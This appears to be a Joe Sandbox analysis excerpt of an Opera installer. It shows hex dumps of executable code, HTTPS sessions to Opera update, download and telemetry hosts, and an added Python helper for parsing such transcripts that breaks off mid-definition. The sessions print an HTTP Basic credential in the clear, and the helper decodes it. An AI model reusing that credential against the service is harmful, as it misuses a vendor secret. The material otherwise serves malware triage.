                                                                                                                                                                          2024-12-09 16:54:02 UTC16384INData Raw: 83 e8 01 89 41 28 75 08 51 e8 06 00 00 00 33 c0 5d c2 04 00 56 8b f1 e8 9c 00 00 00 6a 78 56 e8 a2 c1 00 00 59 59 8b c6 5e c2 04 00 56 8b f1 8d 4e 28 e8 7c 5a ff ff 33 c9 c7 06 28 3b 44 00 b8 00 00 10 00 89 4e 2c 89 46 40 89 46 44 33 c0 40 89 4e 30 89 4e 34 89 4e 3c 89 4e 54 8d 4e 58 c7 46 04 14 3b 44 00 c7 46 08 00 3b 44 00 c7 46 0c ec 3a 44 00 c7 46 10 d4 3a 44 00 c7 46 14 bc 3a 44 00 c7 46 18 a8 3a 44 00 c7 46 1c 94 3a 44 00 c7 46 20 80 3a 44 00 c7 46 24 6c 3a 44 00 c6 46 38 ff 89 46 48 89 46 4c c7 46 50 00 00 00 40 e8 ff 59 ff ff 8b c6 5e c3 55 8b ec 6a ff 68 8c 9b 43 00 64 a1 00 00 00 00 50 56 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 4e 2c c7 06 28 3b 44 00 c7 46 04 14 3b 44 00 c7 46 08 00 3b 44 00 c7 46 0c ec 3a 44 00 c7 46 10 d4
                                                                                                                                                                          Data Ascii: A(uQ3]VjxVYY^VN(|Z3(;DN,F@FD3@N0N4N<NTNXF;DF;DF:DF:DF:DF:DF:DF :DF$l:DF8FHFLFP@Y^UjhCdPV@D3PEdN,(;DF;DF;DF:DF
                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8a 46 03 88 47 03 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8b 46 10 8b 4e 14 89 47 10 8d 46 18 89 4f 14 8d 4f 18 50 e8 ba e6 fe ff 83 65 fc 00 8d 46 24 50 8d 4f 24 e8 aa e6 fe ff 8b c7 e8 09 06 02 00 c2 04 00 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 70 34 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 a0 33 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 83 6c 24 04 04 e9 9d e0 ff ff 83 6c 24 04 08 e9 93 e0 ff ff 83 6c 24 04 0c e9 89
                                                                                                                                                                          Data Ascii: FGFGFGFGFGFGFNGFOOPeF$PO$UjhtCdP@D3PEduhp4DQMdYUjhtCdP@D3PEduh3DQMdYl$l$l$
                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: 8b 48 04 8d 41 98 89 44 31 fc 8b c6 5e c9 c2 10 00 6a 08 b8 2a ad 43 00 e8 66 c6 01 00 6a 00 8d 4d ec e8 0b 4f 00 00 83 65 fc 00 b9 b4 db 44 00 8b 3d a0 db 44 00 89 7d f0 e8 d7 dc ff ff 8b 4d 08 50 e8 ce dd ff ff 8b f0 85 f6 75 4f 85 ff 74 04 8b f7 eb 47 ff 75 08 8d 45 f0 50 e8 b5 03 00 00 59 59 83 f8 ff 74 44 8b 75 f0 8d 4d f0 56 e8 7b 08 00 00 56 c6 45 fc 01 e8 e7 51 00 00 8b 06 59 8b ce ff 50 04 8d 4d f0 89 35 a0 db 44 00 e8 5c 03 00 00 8d 4d f0 e8 66 03 00 00 8d 4d ec e8 e6 4e 00 00 8b c6 e8 b5 c5 01 00 c3 e8 f4 da ff ff cc e8 30 9e fe ff 8b c1 c2 04 00 ff 32 e8 83 05 00 00 c3 56 8b f1 e8 66 05 00 00 8b c6 5e c2 08 00 56 8b f1 e8 58 05 00 00 8b c6 5e c2 04 00 55 8b ec 51 53 56 57 8b f1 e8 07 05 00 00 8b 7d 0c 3b f8 0f 87 81 00 00 00 6a 0f 5b 8b ce 3b
                                                                                                                                                                          Data Ascii: HAD1^j*CfjMOeD=D}MPuOtGuEPYYtDuMV{VEQYPM5D\MfMN02Vf^VX^UQSVW};j[;
                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: 8d 4d f0 8b f0 8b fa e8 4c d7 ff ff 2b c6 8b cb 89 45 f0 8d 45 f0 1b d7 50 89 55 f4 e8 21 d7 ff ff 5f 5e 8b c3 5b c9 c2 04 00 55 8b ec 51 51 56 8b f1 8b ca e8 1f d7 ff ff 6a 00 68 40 42 0f 00 52 50 e8 91 87 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 ea d6 ff ff 8b c6 5e c9 c3 55 8b ec 51 51 56 8b f1 8b ca e8 ec d6 ff ff 6a 00 68 40 42 0f 00 52 50 e8 fe 89 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 b7 d6 ff ff 8b c6 5e c9 c3 81 f9 ff ff ff 7f 0f 87 e3 96 ff ff 8d 04 09 c3 3b 0d 40 b0 44 00 75 01 c3 e9 2e 02 00 00 e9 fe 03 00 00 6a 0c 68 b0 90 44 00 e8 99 08 00 00 c6 45 e7 00 8b 5d 0c 8b c3 8b 7d 10 0f af c7 8b 75 08 03 f0 89 75 08 83 65 fc 00 8b c7 4f 89 7d 10 85 c0 74 15 2b f3 89 75 08 8b 4d 14 ff 15 30 c2 43 00 8b ce ff 55 14 eb e1 b0 01 88 45 e7 c7
                                                                                                                                                                          Data Ascii: ML+EEPU!_^[UQQVjh@BRPEEUP^UQQVjh@BRPEEUP^;@Du.jhDE]}uueO}t+uM0CUE
                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: ec 0f b6 42 ec 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 0e f6 ff ff 8b 46 ed 3b 42 ed 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ed 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e1 f5 ff ff 0f b6 4e ee 0f b6 42 ee 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 bf f5 ff ff 0f b6 4e ef 0f b6 42 ef 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9d f5 ff ff 0f b6 4e f0 0f b6 42 f0 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 7b f5 ff ff 8b 46 f1 3b 42 f1 0f 84 87 00 00 00 0f b6 c8 0f b6 42 f1 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 4e f5 ff ff 0f b6 4e f2 0f b6 42 f2 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 2c f5
                                                                                                                                                                          Data Ascii: B+t3EF;BB+t3ENB+t3ENB+t3ENB+t3E{F;BB+t3ENNB+t3E,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49849 | 107.167.96.38 | 443 | 8040 | C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:54:11 UTC | 183 | OUT | POST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1
User-Agent: Opera NetInstaller/115.0.5322.77
Host: autoupdate.geo.opera.com
Content-Length: 656
Cache-Control: no-cache
2024-12-09 16:54:11 UTC | 656 | OUT | Data Raw: 5a 54 45 7a 4d 7a 45 33 4d 32 55 34 4f 44 68 6b 4e 32 59 33 59 6d 45 30 4f 44 51 33 4e 6d 59 77 4e 6d 4e 6c 4e 6d 4a 6d 4d 44 45 34 4e 6d 59 34 4d 7a 41 7a 59 6d 4e 6d 4e 57 52 6d 4d 57 59 79 59 6d 56 6c 59 57 4a 6d 4e 44 45 78 5a 6a 45 31 5a 44 41 7a 4f 44 70 37 49 6d 4e 76 64 57 35 30 63 6e 6b 69 4f 69 4a 56 55 79 49 73 49 6d 6c 75 63 33 52 68 62 47 78 6c 63 6c 39 75 59 57 31 6c 49 6a 6f 69 54 33 42 6c 63 6d 46 54 5a 58 52 31 63 43 35 6c 65 47 55 69 4c 43 4a 77 63 6d 39 6b 64 57 4e 30 49 6a 70 37 49 6d 35 68 62 57 55 69 4f 69 4a 76 63 47 56 79 59 53 4a 39 4c 43 4a 78 64 57 56 79 65 53 49 36 49 69 39 76 63 47 56 79 59 53 39 7a 64 47 46 69 62 47 55 76 64 32 6c 75 5a 47 39 33 63 7a 39 31 64 47 31 66 63 32 39 31 63 6d 4e 6c 50 55 52 58 54 6b 78 54 56 43 5a
Data Ascii: ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ
2024-12-09 16:54:12 UTC | 477 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 16:54:12 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Allow: GET, HEAD, POST
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:01 GMT
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:54:12 UTC | 942 | IN | Data Raw: 33 61 32 0d 0a 7b 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 61 72 63 68 22 3a 20 22 78 36 34 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 63 68 65 63 6b 73 75 6d 22 3a 20 22 37 32 65 37 37 39 63 65 37 64 33 36 33 61 30 64 31 64 66 64 61 32 36 65 39 61 35 31 36 30 37 39 62 34 64 39 61 30 64 32 31 32 63 34 66 39 34 36 31 36 66 66 30 39 66 65 33 63 66 38 34 64 30 30 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 66 69 6c 65 6e 61 6d 65 22 3a 20 22 4f 70 65 72 61 5f 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 5f 41 75 74 6f 75 70 64 61 74 65 5f 78 36 34 2e 65 78 65 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 73 69 7a 65 22 3a 20 31 31 39 39 37 32 37 31 32 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 22 3a 20 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6f 70 65 72
Data Ascii: 3a2{ "installer_arch": "x64", "installer_checksum": "72e779ce7d363a0d1dfda26e9a516079b4d9a0d212c4f94616ff09fe3cf84d00", "installer_filename": "Opera_115.0.5322.77_Autoupdate_x64.exe", "installer_size": 119972712, "installer": "https://download.oper


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49850 | 107.167.96.39 | 443 | 8040 | C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:54:11 UTC | 120 | OUT | GET /me/ HTTP/1.1
User-Agent: Opera NetInstaller/115.0.5322.77
Host: autoupdate.opera.com
Cache-Control: no-cache
2024-12-09 16:54:12 UTC | 471 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 16:54:12 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Allow: HEAD, GET
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:01 GMT
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:54:12 UTC | 57 | IN | Data Raw: 32 65 0d 0a 7b 0a 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 22 74 69 6d 65 73 74 61 6d 70 22 3a 20 31 37 33 33 37 36 33 32 35 32 0a 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2e{ "country": "US", "timestamp": 1733763252}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49851 | 107.167.125.189 | 443 | 8040 | C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:54:13 UTC | 222 | OUT | POST /v1/binary HTTP/1.1
Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
User-Agent: Opera installer
Host: desktop-netinstaller-sub.osp.opera.software
Content-Length: 1474
Cache-Control: no-cache
2024-12-09 16:54:13 UTC | 1474 | OUT | Data Raw: 00 00 00 05 6a 02 48 38 37 64 31 32 61 64 30 2d 31 63 31 34 2d 34 30 38 66 2d 38 31 35 31 2d 30 65 35 34 65 34 62 64 38 31 31 34 00 d8 db bd c5 f5 64 d8 db bd c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 02 00 00 00 00 02 02 08 6e 6f 6e 65 a0 0a 5a 54 45 7a 4d 7a 45 33 4d 32
Data Ascii: jH87d12ad0-1c14-408f-8151-0e54e4bd8114ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71noneZTEzMzE3M2
2024-12-09 16:54:13 UTC | 162 | IN | HTTP/1.1 201 CREATED
Server: nginx/1.18.0
Date: Mon, 09 Dec 2024 16:54:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36
Connection: close
2024-12-09 16:54:13 UTC | 36 | IN | Data Raw: 38 37 64 31 32 61 64 30 2d 31 63 31 34 2d 34 30 38 66 2d 38 31 35 31 2d 30 65 35 34 65 34 62 64 38 31 31 34
Data Ascii: 87d12ad0-1c14-408f-8151-0e54e4bd8114


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49857 | 107.167.96.30 | 443 | 8040 | C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:54:14 UTC | 249 | OUT | GET /api/v2/features?country=US&language=en-GB&uuid=a6c287cc-47e5-4bf0-9dac-fbaf9040d09e&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1
User-Agent: Opera NetInstaller/115.0.5322.77
Host: features.opera-api2.com
Cache-Control: no-cache
2024-12-09 16:54:14 UTC | 237 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 16:54:14 GMT
Content-Type: application/json
Content-Length: 1768
Connection: close
Cache-Control: max-age=3648
Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:54:14 UTC | 1768 | IN | Data Raw: 7b 22 66 65 61 74 75 72 65 73 22 3a 7b 22 30 31 39 37 39 32 39 39 63 38 63 64 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 33 62 38 33 35 37 65 35 61 30 38 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 36 66 62 62 64 30 62 37 62 66 37 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 30 66 39 63 66 38 37 35 38 62 63 63 22 3a 7b 22 73 74 61 74 65 22 3a 22 64 69 73 61 62 6c 65 64 22 7d 2c 22 31 63 34 64 64 64 62 36 35 62 61 63 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 31 64 32 34 64 63 65 62 39 33 37 61 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65 64 22 7d 2c 22 32 31 31 34 64 63 38 62 64 37 32 61 22 3a 7b 22 73 74 61 74 65 22 3a 22 65 6e 61 62 6c 65
Data Ascii: {"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enable


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.449858107.167.96.364438040C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:14 UTC262OUTGET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=cd9f81c6-729a-4d95-ac71-1ebba75bfc7b HTTP/1.1
                                                                                                                                                                          User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                                                          Host: download.opera.com
                                                                                                                                                                          Cache-Control: no-cache
2024-12-09 16:54:15 UTC | 346 | IN | HTTP/1.1 302 Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:15 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Location: https://download3.operacdn.com/ftp/pub/opera/desktop/115.0.5322.77/win/Opera_115.0.5322.77_Autoupdate_x64.exe
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
2024-12-09 16:54:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49859 | 107.167.125.189 | 443 | 8040 | C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:54:15 UTC | 221 | OUT | POST /v1/binary HTTP/1.1
                                                                                                                                                                          Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                                                          User-Agent: Opera installer
                                                                                                                                                                          Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          Content-Length: 254
                                                                                                                                                                          Cache-Control: no-cache
2024-12-09 16:54:15 UTC | 254 | OUT | Data Raw: 00 00 00 05 6a 02 48 32 66 39 62 34 31 33 32 2d 61 36 35 36 2d 34 30 33 31 2d 39 61 65 33 2d 33 66 33 66 37 36 35 39 37 35 62 61 00 d8 db bd c5 f5 64 c8 8d be c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 0e 00 00 00 00 04 00 00 02 01 01 02 02 00 00 00 00 00 00 00 08 02 02
                                                                                                                                                                          Data Ascii: jH2f9b4132-a656-4031-9ae3-3f3f765975baddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71
2024-12-09 16:54:15 UTC | 162 | IN | HTTP/1.1 201 CREATED
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:15 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 36
                                                                                                                                                                          Connection: close
2024-12-09 16:54:15 UTC | 36 | IN | Data Raw: 32 66 39 62 34 31 33 32 2d 61 36 35 36 2d 34 30 33 31 2d 39 61 65 33 2d 33 66 33 66 37 36 35 39 37 35 62 61
                                                                                                                                                                          Data Ascii: 2f9b4132-a656-4031-9ae3-3f3f765975ba


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49866 | 107.167.125.189 | 443 | 8040 | C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:54:17 UTC | 221 | OUT | POST /v1/binary HTTP/1.1
                                                                                                                                                                          Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                                                          User-Agent: Opera installer
                                                                                                                                                                          Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          Content-Length: 248
                                                                                                                                                                          Cache-Control: no-cache
2024-12-09 16:54:17 UTC | 248 | OUT | Data Raw: 00 00 00 05 6a 02 48 62 62 33 36 63 33 66 30 2d 34 38 66 64 2d 34 32 30 65 2d 38 37 34 30 2d 63 32 30 33 65 32 63 66 34 38 38 64 00 82 dc bd c5 f5 64 9e ad be c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 14 00 00 00 00 06 00 00 00 00 00 00 00 00 08 04 04
                                                                                                                                                                          Data Ascii: jHbb36c3f0-48fd-420e-8740-c203e2cf488dddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71
2024-12-09 16:54:17 UTC | 162 | IN | HTTP/1.1 201 CREATED
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:17 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 36
                                                                                                                                                                          Connection: close
2024-12-09 16:54:17 UTC | 36 | IN | Data Raw: 62 62 33 36 63 33 66 30 2d 34 38 66 64 2d 34 32 30 65 2d 38 37 34 30 2d 63 32 30 33 65 32 63 66 34 38 38 64
                                                                                                                                                                          Data Ascii: bb36c3f0-48fd-420e-8740-c203e2cf488d


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49872 | 107.167.125.189 | 443 | 8040 | C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:54:19 UTC | 221 | OUT | POST /v1/binary HTTP/1.1
                                                                                                                                                                          Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                                                          User-Agent: Opera installer
                                                                                                                                                                          Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          Content-Length: 444
                                                                                                                                                                          Cache-Control: no-cache
2024-12-09 16:54:19 UTC | 444 | OUT | Data Raw: 00 00 00 05 6a 02 48 38 31 65 31 30 32 38 39 2d 33 37 33 61 2d 34 65 35 38 2d 38 65 66 66 2d 30 38 63 64 61 30 64 36 33 39 38 36 00 be 86 be c5 f5 64 8c cd be c5 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 63 64 39 66 38 31 63 36 2d 37 32 39 61 2d 34 64 39 35 2d 61 63 37 31 2d 31 65 62 62 61 37 35 62 66 63 37 62 02 48 35 37 66 34 62 37 63 31 2d 31 38 37 35 2d 34 63 33 64 2d 61 61 64 61 2d 66 65 31 65 35 39 35 66 39 62 37 31 02 16 02 dc 02 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6f 70 65
                                                                                                                                                                          Data Ascii: jH81e10289-373a-4e58-8eff-08cda0d63986ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610Hcd9f81c6-729a-4d95-ac71-1ebba75bfc7bH57f4b7c1-1875-4c3d-aada-fe1e595f9b71https://download.ope
2024-12-09 16:54:19 UTC | 162 | IN | HTTP/1.1 201 CREATED
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:19 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 36
                                                                                                                                                                          Connection: close
2024-12-09 16:54:19 UTC | 36 | IN | Data Raw: 38 31 65 31 30 32 38 39 2d 33 37 33 61 2d 34 65 35 38 2d 38 65 66 66 2d 30 38 63 64 61 30 64 36 33 39 38 36
                                                                                                                                                                          Data Ascii: 81e10289-373a-4e58-8eff-08cda0d63986
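The four sessions above all belong to the same dropped child process, setup.exe (PID 8040): one GET to download.opera.com that is redirected to the Opera Autoupdate package on operacdn.com, and three POSTs to desktop-netinstaller-sub.osp.opera.software that carry the same HTTP Basic credential on every request. The Python helper below is an added example for triaging session transcripts in exactly this flattened form; it is not part of the Joe Sandbox report and not code from either installer. It splits the rows into messages, decodes the Basic credential (for the header above this yields a fixed token with an empty password), collects the hosts and redirect targets, and compares the declared byte count of each Data Raw row with the bytes actually shown, because the report shortens long payload lines and a shortfall means the capture on the page is incomplete rather than that the client sent fewer bytes. The sample transcript embedded in the code is constructed from the rows above; its last row is a deliberately shortened copy of the 444-byte POST body.

```python
"""Triage helper for Joe Sandbox HTTP session transcripts.

Added example, not part of the report or of any installer shown in it.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# One transcript row: "<timestamp> UTC<bytes><IN|OUT><first line of the message>"
ROW = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC)(\d+)(IN|OUT)(.*)$")

# Constructed sample built from the session rows above. The last row is a
# deliberately shortened copy of the 444-byte POST body, to show how a
# report-truncated payload is detected.
SAMPLE = """\
2024-12-09 16:54:14 UTC262OUTGET /download/get/?id=69044&autoupdate=1&stream=stable HTTP/1.1
User-Agent: Opera NetInstaller/115.0.5322.77
Host: download.opera.com
2024-12-09 16:54:15 UTC346INHTTP/1.1 302 Found
Server: nginx
Location: https://download3.operacdn.com/ftp/pub/opera/desktop/115.0.5322.77/win/Opera_115.0.5322.77_Autoupdate_x64.exe
2024-12-09 16:54:15 UTC5INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0
2024-12-09 16:54:15 UTC221OUTPOST /v1/binary HTTP/1.1
Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
User-Agent: Opera installer
Host: desktop-netinstaller-sub.osp.opera.software
Content-Length: 254
2024-12-09 16:54:15 UTC162INHTTP/1.1 201 CREATED
Content-Length: 36
2024-12-09 16:54:15 UTC36INData Raw: 32 66 39 62 34 31 33 32 2d 61 36 35 36 2d 34 30 33 31 2d 39 61 65 33 2d 33 66 33 66 37 36 35 39 37 35 62 61
2024-12-09 16:54:19 UTC444OUTData Raw: 00 00 00 05 6a 02 48
"""


@dataclass
class Message:
    timestamp: str
    declared_bytes: int          # "Bytes transferred" column of the report
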